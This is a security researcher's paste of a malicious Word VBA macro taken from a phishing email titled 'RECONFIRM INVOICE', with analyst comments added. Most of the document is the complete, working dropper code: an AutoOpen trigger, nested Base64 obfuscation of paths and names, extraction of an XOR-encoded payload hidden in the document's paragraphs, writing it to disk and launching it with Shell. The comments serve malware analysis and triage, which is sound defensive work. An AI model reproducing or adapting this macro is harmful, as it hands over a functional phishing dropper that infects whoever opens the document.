Neonprimetime

Malicious VBA Macro SUBJECT: RECONFIRM INVOICE

Jun 7th, 2016
  1. Raw Malicious VBA Macro from Email
  2. *******
  3. SUBJECT: RECONFIRM INVOICE
  4. ATTACHMENT: RECONFIRM INVOICE.doc
  5. *******
  6. *******
  7.  
  8. Attribute VB_Name = "NewMacros"
  9. Option Explicit
  10.  
  11. Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHOneMask = 16515072 ' &HFC0000: bits 18-23 of a 24-bit group (1st Base64 sextet)
  12. Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHTwoMask = 258048 ' &H3F000: bits 12-17 (2nd sextet)
  13. Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHThreeMask = 4032 ' &HFC0: bits 6-11 (3rd sextet)
  14. Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHFourMask = 63 ' &H3F: bits 0-5 (4th sextet)
  15.  
  16. Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHighMask = 16711680 ' &HFF0000: high byte of a 24-bit group
  17. Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHMidMask = 65280 ' &HFF00: middle byte
  18. Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHLowMask = 255 ' &HFF: low byte
  19.  
  20. Private Const MNAJSAQQQQQQ18 = 262144 ' 2^18: multiply/divide by this to shift 18 bits
  21. Private Const MNAJSAQQQQQQ12 = 4096 ' 2^12: shift by 12 bits
  22. Private Const MNAJSAQQQQQQ6 = 64 ' 2^6: shift by 6 bits
  23. Private Const MNAJSAQQQQQQ8 = 256 ' 2^8: shift by 8 bits
  24. Private Const MNAJSAQQQQQQ16 = 65536 ' 2^16: shift by 16 bits
  25.  
  26. Public Function Encode64(sString As String) As String
      ' Analyst note: Base64 encoder over the standard alphabet (A-Z, a-z, 0-9, "+", "/").
      ' The input is padded with Chr(0) to a multiple of 3 bytes and encoded three bytes at a
      ' time. A CR/LF pair is written after every 72 output characters, and "=" padding is
      ' patched over the tail at the end.
      ' sString is not declared ByVal, so the Chr(0) padding added below is also applied to the
      ' caller's variable.
      ' In the visible code this is only called from S1 and S2, and always wrapped in sss()
      ' (the decoder), so the encode/decode pair round-trips the string.
  27.  
  28.     Dim bTrans(63) As Byte, OOOPOOOOPOOOO8(255) As Long, OOOPOOOOPOOOO16(255) As Long, bOut() As Byte, bIn() As Byte
  29.     Dim BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB As Long, lTrip As Long, iPad As Integer, lLen As Long, mnAjUYt As Long, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA As Long, lOutSize As Long
  30.  
      ' Build the sextet -> ASCII table: 0-25 "A"-"Z", 26-51 "a"-"z", 52-61 "0"-"9", 62 "+", 63 "/".
  31.     For mnAjUYt = 0 To 63
  32.         Select Case mnAjUYt
  33.             Case 0 To 25
  34.                 bTrans(mnAjUYt) = 65 + mnAjUYt
  35.             Case 26 To 51
  36.                 bTrans(mnAjUYt) = 71 + mnAjUYt
  37.             Case 52 To 61
  38.                 bTrans(mnAjUYt) = mnAjUYt - 4
  39.             Case 62
  40.                 bTrans(mnAjUYt) = 43
  41.             Case 63
  42.                 bTrans(mnAjUYt) = 47
  43.         End Select
  44.     Next mnAjUYt
  45.  
      ' Precomputed "byte shifted left by 8 / 16 bits" lookup tables.
  46.     For mnAjUYt = 0 To 255
  47.         OOOPOOOOPOOOO8(mnAjUYt) = mnAjUYt * MNAJSAQQQQQQ8
  48.         OOOPOOOOPOOOO16(mnAjUYt) = mnAjUYt * MNAJSAQQQQQQ16
  49.     Next mnAjUYt
  50.  
      ' iPad = number of zero bytes needed to reach a multiple of 3 (0, 1 or 2).
  51.     iPad = Len(sString) Mod 3
  52.     If iPad Then
  53.         iPad = 3 - iPad
  54.         sString = sString & String(iPad, Chr(0))
  55.     End If
  56.  
      ' Output buffer: 4 characters per 3 input bytes plus 2 bytes (CR/LF) per 72-character line.
  57.     bIn = StrConv(sString, vbFromUnicode)
  58.     lLen = ((UBound(bIn) + 1) \ 3) * 4
  59.     mnAjUYt = lLen \ 72
  60.     lOutSize = ((mnAjUYt * 2) + lLen) - 1
  61.     ReDim bOut(lOutSize)
  62.  
      ' From here on lLen is reused as the character count of the current output line.
  63.     lLen = 0
  64.  
  65.     For BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB = LBound(bIn) To UBound(bIn) Step 3
          ' Pack three input bytes into one 24-bit value, then emit its four 6-bit groups.
  66.         lTrip = OOOPOOOOPOOOO16(bIn(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB)) + OOOPOOOOPOOOO8(bIn(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB + 1)) + bIn(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB + 2)
  67.         mnAjUYt = lTrip And HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHOneMask
  68.         bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) = bTrans(mnAjUYt \ MNAJSAQQQQQQ18)
  69.         mnAjUYt = lTrip And HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHTwoMask
  70.         bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 1) = bTrans(mnAjUYt \ MNAJSAQQQQQQ12)
  71.         mnAjUYt = lTrip And HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHThreeMask
  72.         bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 2) = bTrans(mnAjUYt \ MNAJSAQQQQQQ6)
  73.         bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 3) = bTrans(lTrip And HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHFourMask)
          ' 68 characters already on the line plus the 4 just written = 72: append CR (13) LF (10).
  74.         If lLen = 68 Then
  75.             bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 4) = 13
  76.             bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 5) = 10
  77.             lLen = 0
  78.             AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 6
  79.         Else
  80.             lLen = lLen + 4
  81.             AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 4
  82.         End If
  83.     Next BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
  84.  
      ' If the buffer ends in a line break, step back over it so the "=" padding below
      ' overwrites the last encoded characters instead of the CR/LF.
  85.     If bOut(lOutSize) = 10 Then lOutSize = lOutSize - 2
  86.  
      ' Replace the characters produced by the Chr(0) padding with "=" (61).
  87.     If iPad = 1 Then
  88.         bOut(lOutSize) = 61
  89.     ElseIf iPad = 2 Then
  90.         bOut(lOutSize) = 61
  91.         bOut(lOutSize - 1) = 61
  92.     End If
  93.  
  94.     Encode64 = StrConv(bOut, vbUnicode)
  95.  
  96. End Function
  97.  
  98. Public Function sss(sString As String) As String
      ' Analyst note: Base64 decoder for the standard alphabet; this is the macro's string
      ' de-obfuscation routine. Every hard-coded literal in this module is passed through
      ' several nested sss() calls before use, so no path, file name, ProgID or command is
      ' visible as plain text. Recover them by decoding the literals offline the same number
      ' of times, not by running the macro.
      ' CR and LF are stripped first; bytes outside the alphabet map to 0 because bTrans is
      ' zero-initialised.
  99.  
  100.     Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, OOOPOOOOPOOOO6(63) As Long, OOOPOOOOPOOOO12(63) As Long
  101.     Dim OOOPOOOOPOOOO18(63) As Long, lQuad As Long, iPad As Integer, BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB As Long, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA As Long, sOut As String
  102.     Dim mnAjUYt As Long
  103.  
  104.     sString = Replace(sString, vbCr, vbNullString)
  105.     sString = Replace(sString, vbLf, vbNullString)
  106.  
       ' This value is never read: mnAjUYt is overwritten by the For loop below.
  107.     mnAjUYt = Len(sString) Mod 4
  108.    
       ' Padding count: InStrRev only checks that "==" / "=" occurs somewhere in the string.
  109.     If InStrRev(sString, "==") Then
  110.         iPad = 2
  111.     ElseIf InStrRev(sString, "=") Then
  112.         iPad = 1
  113.     End If
  114.  
       ' Build the ASCII -> sextet table: "A"-"Z" 0-25, "a"-"z" 26-51, "0"-"9" 52-61, "+" 62, "/" 63.
  115.     For mnAjUYt = 0 To 255
  116.         Select Case mnAjUYt
  117.             Case 65 To 90
  118.                 bTrans(mnAjUYt) = mnAjUYt - 65
  119.             Case 97 To 122
  120.                 bTrans(mnAjUYt) = mnAjUYt - 71
  121.             Case 48 To 57
  122.                 bTrans(mnAjUYt) = mnAjUYt + 4
  123.             Case 43
  124.                 bTrans(mnAjUYt) = 62
  125.             Case 47
  126.                 bTrans(mnAjUYt) = 63
  127.         End Select
  128.     Next mnAjUYt
  129.  
       ' Precomputed "sextet shifted left by 6 / 12 / 18 bits" lookup tables.
  130.     For mnAjUYt = 0 To 63
  131.         OOOPOOOOPOOOO6(mnAjUYt) = mnAjUYt * MNAJSAQQQQQQ6
  132.         OOOPOOOOPOOOO12(mnAjUYt) = mnAjUYt * MNAJSAQQQQQQ12
  133.         OOOPOOOOPOOOO18(mnAjUYt) = mnAjUYt * MNAJSAQQQQQQ18
  134.     Next mnAjUYt
  135.  
       ' Output buffer: 3 bytes for every 4 input characters.
  136.     bIn = StrConv(sString, vbFromUnicode)
  137.     ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)
  138.  
  139.     For BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB = 0 To UBound(bIn) Step 4
           ' Pack four sextets into one 24-bit value, then split it into three bytes.
  140.         lQuad = OOOPOOOOPOOOO18(bTrans(bIn(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB))) + OOOPOOOOPOOOO12(bTrans(bIn(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB + 1))) + _
  141.                 OOOPOOOOPOOOO6(bTrans(bIn(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB + 2))) + bTrans(bIn(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB + 3))
  142.         mnAjUYt = lQuad And HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHighMask
  143.         bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) = mnAjUYt \ MNAJSAQQQQQQ16
  144.         mnAjUYt = lQuad And HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHMidMask
  145.         bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 1) = mnAjUYt \ MNAJSAQQQQQQ8
  146.         bOut(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 2) = lQuad And HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHLowMask
  147.         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 3
  148.     Next BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
  149.  
       ' Drop the 1 or 2 bytes that correspond to "=" padding.
  150.     sOut = StrConv(bOut, vbUnicode)
  151.     If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
  152.     sss = sOut
  153.  
  154. End Function
  155.  
  156. Sub AddSpace()
       ' Analyst note: trampoline only. Both auto-run handlers (AutoOpen, Workbook_Open) call
       ' this, and it calls RemoveParagraph, which writes the payload file and launches it.
       ' The name does not describe what the routine does.
  157. RemoveParagraph
  158. End Sub
  159.  
  160. Sub S1(b As String)
       ' Analyst note: wrapper around MkDir. Encode64 followed by sss (encode then decode)
       ' appears to be a round trip that yields b again, so this creates directory b;
       ' the extra calls only keep a plain MkDir <path> out of the source.
  161. MkDir (sss(Encode64(b)))
  162. End Sub
  163. Sub S2(b As String)
       ' Analyst note: wrapper around ChDir using the same encode-then-decode round trip as S1;
       ' it changes the current directory to b.
  164. ChDir (sss(Encode64(b)))
  165. End Sub
  166. Sub RemoveParagraph()
       ' Analyst note: this is the dropper. Despite its name it removes nothing from the document. It:
       '   1. builds a directory path from an environment variable plus a decoded suffix,
       '   2. deletes that directory if it already exists (Wipedir) and creates it again (S1),
       '   3. opens a file there for binary output,
       '   4. walks ActiveDocument.Paragraphs and, from the 24th paragraph on, reads the text two
       '      characters at a time, converts each pair to a byte, XORs it with &H4C and writes it,
       '   5. closes the file and passes control to vEnd34919638833, which launches a program via Shell.
       ' So the payload travels inside the document body as text, XOR-encoded with the single-byte
       ' key &H4C. For triage, extract the paragraph text and decode it offline; do not open the
       ' document with macros enabled.
       ' Most of the Dim'd variables below are never used in the visible code.
  167.     Dim vEnd3855202881 As Integer
  168.     Dim vEnd1859739270 As Integer
  169.     Dim vEnd3491963883 As String
  170.     Dim vEnd349196388399 As String
  171.     Dim vEnd988888527 As String
  172.     Dim vEnd1400215006 As Integer
  173.     Dim vEnd140021500699 As Integer
  174.     Dim vEnd1636671794 As Paragraph
  175.     Dim vEnd961873140 As Long
  176.     Dim vEnd3892361924 As Boolean
  177.     Dim vEnd2384858154 As Integer
  178.     Dim vEnd34919638831 As String
  179.     Dim vEnd3491963883199 As String
  180.     Dim vEnd3120080411 As Byte
  181.     Dim vEnd312008041199 As Byte
  182.     Dim vEnd3569041833 As String
  183.     Dim vEnd4030732206 As String
       ' Decoded prefix that is prepended to every two-character chunk in the loop below.
       ' NOTE(review): presumably a hex-literal prefix such as "&H" so VBA coerces the text to a
       ' number - confirm by decoding offline.
  184.     vEnd4030732206 = sss(sss(sss(sss(sss(sss(sss("Vm14U1NtVkZNVWhUYms1U1lrVndVbFpyVWtKUFVUMDk=")))))))
       ' Decoded here but not referenced again in the visible code.
  185.     vEnd3569041833 = sss(sss(sss(sss(sss(sss(sss(sss(sss(sss("Vm0wd2QyUXlWa1pPVldSWFYwZG9WMVl3Wkc5WFJsbDNXa1JTVjFKdGVGWlZNakExVmpKS1NHVkVRbUZXVjFKSVZtcEJlRmRIVmtWUmJVWlRWbXhzTTFkV1pEUlRNbEpJVm10c2FsSnRVbkJWYlhSM1UxWmtWMXBJY0d4U2JWSllWVzAxVDFsV1NuTmpTRUpXWWxoU00xUnRlR0ZqTVdSMFVteGtUbFp1UWxoV1JscFhWakpHU0ZadVJsSldSM001"))))))))))
  186.     Dim vEnd3465700673 As String
       ' Working directory = Environ(<decoded variable name>) + <decoded suffix>.
       ' The same two literals are repeated in vEnd34919638833.
  187.     vEnd988888527 = Environ(sss(sss(sss(sss("VlZaV05GUldXbGRVYTFwV1lrVTFVbFpYY3pWU01VNVdaVVZaUFE9PQ=="))))) + sss(sss(sss(sss(sss(sss(sss(sss(sss(sss("Vm0wd2QyVkhVWGhTV0doWVYwZG9XVmx0ZUV0WFJteFZVMjA1VjFadGVGWlZNakExVmpGYWRHVkliRmhoTVVwVVZtcEtTMU5IVmtkaVIwWlhWakZLU1ZkV1pEUlpWMUpYVW01S2FsSnVRbTlaV0hCWFpWWmFjMVp0UmxkTlZuQlhWRlpXVjJGSFZuRlJWR3M5"))))))))))
  188.  
       ' Create the directory, deleting any earlier copy first.
  189.     If Len(dir(vEnd988888527, vbDirectory)) = 0 Then
  190.         S1 (vEnd988888527)
  191.     Else:
  192.         Wipedir (vEnd988888527)
  193.         S1 (vEnd988888527)
  194.     End If
  195.        
       ' Decoded name of the file that receives the payload bytes. It is opened after the
       ' ChDrive/ChDir below, so a relative name would resolve inside the directory created above.
  196.     vEnd3491963883 = sss(sss(sss(sss(sss(sss(sss(sss(sss("Vm0weGQxSXlSWGRPVldoVVYwZG9WMWx0ZUV0V01XeHlXa1pPYWxac1dqQlVWbEpUWVZVeFYxZHVhRmRTZWtZelZsVmFWMVpWTVVWaGVqQTk=")))))))))
  197.     ChDrive (vEnd988888527)
  198.     S2 (vEnd988888527)
  199.     vEnd1400215006 = FreeFile()
  200.     Open vEnd3491963883 For Binary As vEnd1400215006
  201.     vEnd1859739270 = 0
  202.     For Each vEnd1636671794 In ActiveDocument.Paragraphs
  203.         DoEvents
  204.             vEnd34919638831 = vEnd1636671794.Range.Text
  205.             vEnd961873140 = 1
  206.             vEnd1859739270 = vEnd1859739270 + 1
           ' Paragraphs 1-23 are skipped; the encoded payload starts at paragraph 24.
  207.         If vEnd1859739270 >= 24 Then
  208.             While (vEnd961873140 < Len(vEnd34919638831))
                   ' prefix & two characters is assigned to a Byte, so VBA converts the text to a number.
  209.                 vEnd3120080411 = vEnd4030732206 & Mid(vEnd34919638831, vEnd961873140, 2)
                   ' Single-byte XOR with key &H4C recovers the real payload byte.
  210.                 vEnd3120080411 = vEnd3120080411 Xor &H4C
  211.                 Put #vEnd1400215006, , vEnd3120080411
  212.                 vEnd961873140 = vEnd961873140 + 2
  213.             Wend
  214.         End If
  215.     Next
  216.     Close #vEnd1400215006
       ' Hand over to the launcher. It ignores the file name passed here and rebuilds its own path.
  217.     vEnd34919638833 (vEnd3491963883)
  218. End Sub
  219.  
  220.  
  221. Public Sub Wipedir(pppppppppppppppppppppppppp As String)
       ' Analyst note: deletes the folder named by the argument through a late-bound COM object.
       ' The ProgID passed to CreateObject is hidden behind nested sss() calls.
       ' NOTE(review): the FolderExists / DeleteFolder methods are consistent with
       ' Scripting.FileSystemObject - confirm by decoding the literal offline.
       ' If the folder does not exist, the bare End statement stops all macro execution.
  222. Dim OOO
  223. Set OOO = CreateObject(sss(sss(sss(sss(sss(sss(sss("Vm0weE5GVXhUWGhWV0d4WFlrZG9WRmxyWkRSVk1XeFlaRVYwYVUxV2NERlpNRnByWVRGYWMxTnJiR0ZTVjFKSVdWZDRTbVF5VGtaaVJtUnBWMGRvVlZkWGRHRmhNVXB5VGxWc1lWSnRhSEJWYWtFd1RVWmFjMVp0Um1wTmJFcEpWa2QwYjJKR1NuVlJhemxWVm14YVYxUnNSVGxRVVQwOQ=="))))))))
  224. If OOO.folderexists(pppppppppppppppppppppppppp) Then
  225. OOO.deletefolder pppppppppppppppppppppppppp
  226. Else
  227. End
  228. End If
  229.  
  230. End Sub
  231. Sub Shits(vbHH As String)
       ' Analyst note: process-launch primitive. Shell starts the command line in vbHH with
       ' window style 1 (vbNormalFocus); the returned task ID is stored and never used.
       ' An Office application spawning a child process from a macro is the behaviour to alert on.
  232. Dim OBsGG
  233. OBsGG = Shell(vbHH, 1)
  234. End Sub
  235. Sub vEnd34919638833(vEnd34919638830 As String)
       ' Analyst note: launcher stage. It rebuilds the directory path from the same two literals
       ' that RemoveParagraph uses, makes it the current drive and directory, and passes
       ' <directory> + <decoded suffix> to Shits, which runs it with Shell.
       ' The parameter vEnd34919638830 and the local vEnd3855202881 are never read.
       ' NOTE(review): the decoded suffix presumably names the file written by RemoveParagraph -
       ' confirm by decoding both literals offline.
  236.     Dim vEnd3855202881 As Integer
  237.     Dim vEnd988888527 As String
  238. vEnd988888527 = Environ(sss(sss(sss(sss("VlZaV05GUldXbGRVYTFwV1lrVTFVbFpYY3pWU01VNVdaVVZaUFE9PQ=="))))) + sss(sss(sss(sss(sss(sss(sss(sss(sss(sss("Vm0wd2QyVkhVWGhTV0doWVYwZG9XVmx0ZUV0WFJteFZVMjA1VjFadGVGWlZNakExVmpGYWRHVkliRmhoTVVwVVZtcEtTMU5IVmtkaVIwWlhWakZLU1ZkV1pEUlpWMUpYVW01S2FsSnVRbTlaV0hCWFpWWmFjMVp0UmxkTlZuQlhWRlpXVjJGSFZuRlJWR3M5"))))))))))
  239.     ChDrive (vEnd988888527)
  240.     S2 (vEnd988888527)
  241.     Shits (vEnd988888527 + sss(sss(sss(sss("VjBWamVHVnJlSFJXYWxKaFZWUXdPUT09")))))
  242.    
  243. End Sub
  244.  
  245. Sub AutoOpen()
       ' Analyst note: execution trigger. Word runs a macro named AutoOpen when the document is
       ' opened with macros enabled, so the whole chain starts without further user action:
       ' AutoOpen -> AddSpace -> RemoveParagraph -> vEnd34919638833 -> Shits (Shell).
  246. AddSpace
  247. End Sub
  248.  
  249. Private Sub Workbook_Open()
       ' Analyst note: second trigger, using the name of Excel's workbook-open event handler,
       ' and calling the same AddSpace entry point.
       ' NOTE(review): this module is a Word macro module ("NewMacros") attached to a .doc, so
       ' this handler is presumably never fired here; it looks like leftover from a shared
       ' Word/Excel template - confirm.
  250. AddSpace
  251. End Sub
  252.  
  253. *******
  254. *******
  255. *******
  256. More FROM @neonprimetime security
  257.  
  258. http://pastebin.com/u/Neonprimetime
  259. https://www.virustotal.com/en/USER/neonprimetime/
  260. https://twitter.com/neonprimetime
  261. https://www.reddit.com/USER/neonprimetime